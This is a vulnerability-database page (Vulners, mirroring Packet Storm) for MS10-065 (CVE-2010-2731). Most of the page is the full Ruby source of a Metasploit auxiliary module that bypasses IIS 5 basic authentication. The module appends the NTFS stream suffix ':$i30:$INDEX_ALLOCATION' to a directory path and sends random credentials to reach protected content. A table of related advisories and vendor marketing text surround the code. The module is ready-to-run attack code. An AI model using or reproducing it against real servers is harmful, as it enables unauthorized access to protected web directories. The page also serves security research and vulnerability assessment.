Vulners
Lucene search
MS10-065 Microsoft IIS 5 NTFS Stream Authentication Bypass
🗓️ 31 Aug 2024 00:00:00Reported by Soroush Dalili, sinn3r, metasploit.comType 
packetstorm🔗 packetstormsecurity.com👁 227 Views
| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
 | CVE-2010-2731 | 2 Jul 201000:00 | – | circl |
 | Microsoft IIS Directory Authentication Bypass (MS10-065; CVE-2010-1899; CVE-2010-2731) | 14 Sep 201000:00 | – | checkpoint_advisories |
 | CVE-2010-2731 | 15 Sep 201018:00 | – | cve |
 | CVE-2010-2731 | 15 Sep 201018:00 | – | cvelist |
 | Microsoft IIS 7.0 Vulnerabilities (uncredentialed) (PCI/DSS) | 3 Apr 201800:00 | – | nessus |
| IIS 5.x Alternate Data Stream Authentication Bypass | 5 Jul 201000:00 | – | nessus |
| MS10-065: Vulnerabilities in Microsoft Internet Information Services (IIS) Could Allow Remote Code Execution (2267960) | 14 Sep 201000:00 | – | nessus |
 | MS10-065: Vulnerabilities in Microsoft Internet Information Services (IIS) could allow remote code execution | 18 Jul 201218:49 | – | mskb |
 | MS10-065 Microsoft IIS 5 NTFS Stream Authentication Bypass | 25 Jun 201220:48 | – | metasploit |
 | CVE-2010-2731 | 15 Sep 201019:00 | – | nvd |
10
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(
update_info(
info,
'Name' => 'MS10-065 Microsoft IIS 5 NTFS Stream Authentication Bypass',
'Description' => %q{
This module bypasses basic authentication for Internet Information Services (IIS).
By appending the NTFS stream name to the directory name in a request, it is
possible to bypass authentication.
},
'References' => [
[ 'CVE', '2010-2731' ],
[ 'OSVDB', '66160' ],
[ 'MSB', 'MS10-065' ],
[ 'URL', 'https://soroush.secproject.com/blog/2010/07/iis5-1-directory-authentication-bypass-by-using-i30index_allocation/' ]
],
'Author' => [
'Soroush Dalili',
'sinn3r'
],
'License' => MSF_LICENSE,
'DisclosureDate' => '2010-07-02'
)
)
register_options(
[
OptString.new('TARGETURI', [true, 'The URI directory where basic auth is enabled', '/'])
]
)
end
def has_auth
uri = normalize_uri(target_uri.path)
uri << '/' if uri[-1, 1] != '/'
res = send_request_cgi({
'uri' => uri,
'method' => 'GET'
})
vprint_status(res.body) if res
return (res and res.code == 401)
end
def try_auth
uri = normalize_uri(target_uri.path)
uri << '/' if uri[-1, 1] != '/'
uri << Rex::Text.rand_text_alpha(rand(5..14)) + ".#{Rex::Text.rand_text_alpha(3)}"
dir = File.dirname(uri) + ':$i30:$INDEX_ALLOCATION' + '/'
user = Rex::Text.rand_text_alpha(rand(5..14))
pass = Rex::Text.rand_text_alpha(rand(5..14))
vprint_status("Requesting: #{dir}")
res = send_request_cgi({
'uri' => dir,
'method' => 'GET',
'authorization' => basic_auth(user, pass)
})
vprint_status(res.body) if res
return (res && (res.code != 401) && (res.code != 404)) ? dir : ''
end
def run
if !has_auth
print_error('No basic authentication enabled')
return
end
bypass_string = try_auth
if bypass_string.empty?
print_error('The bypass attempt did not work')
else
print_good("You can bypass auth by doing: #{bypass_string}")
end
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
31 Aug 2024 00:00Current
7High risk
Vulners AI Score7
CVSS 26.8
EPSS0.66776